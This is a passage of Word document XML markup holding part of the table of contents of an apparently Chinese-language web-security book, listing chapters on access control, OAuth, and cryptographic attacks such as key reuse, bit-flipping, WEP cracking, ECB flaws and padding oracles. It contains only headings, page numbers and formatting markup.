          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>201</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.639997pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1768" coordorigin="254,393" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:392;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1317;top:414;width:7139;height:277" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7118" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="276" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>访问</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>控</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>制</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>205</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:460;width:810;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="1"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>10</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-33"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>9.8</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>203</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1628" w:val="left" w:leader="none"/>
          <w:tab w:pos="1629" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="559" w:after="0"/>
        <w:ind w:left="1628" w:right="0" w:hanging="597"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Do?</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>205</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="59" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>垂直</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>限管理</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>208</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8348" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="55" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>水平</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>限管理</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>211</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1630" w:val="left" w:leader="none"/>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1630" w:right="0" w:hanging="599"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OAuth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>简介</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>213</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.639997pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1840" coordorigin="254,393" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:392;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1303;top:414;width:7153;height:277" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7132" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="276" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>加</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>密</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>算</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>法</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>与</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>随</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>数</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>220</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:460;width:796;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>11</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-34"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.5</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>219</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1621" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="536"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>11.1</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>概述</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>220</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1623" w:val="left" w:leader="none"/>
          <w:tab w:pos="1624" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="78" w:after="0"/>
        <w:ind w:left="1623" w:right="0" w:hanging="592"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Attack</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>222</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="106" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reused</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Attack</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>222</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="105" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Bit-flipping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Attack</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>228</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="336" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="560" w:after="0"/>
        <w:ind w:left="335" w:right="0" w:hanging="130"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="90"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>XII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:w w:val="90"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="75"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="149" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>弱随</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-31"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>问题</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>230</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1621" w:val="left" w:leader="none"/>
          <w:tab w:pos="1622" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="57" w:after="0"/>
        <w:ind w:left="1621" w:right="0" w:hanging="590"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>WEP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>破解</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>232</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1623" w:val="left" w:leader="none"/>
          <w:tab w:pos="1624" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1623" w:right="0" w:hanging="592"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ECB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>模</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的缺陷</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>236</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1621" w:val="left" w:leader="none"/>
          <w:tab w:pos="1622" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="78" w:after="0"/>
        <w:ind w:left="1621" w:right="0" w:hanging="590"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Padding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Oracle Attack</w:t>
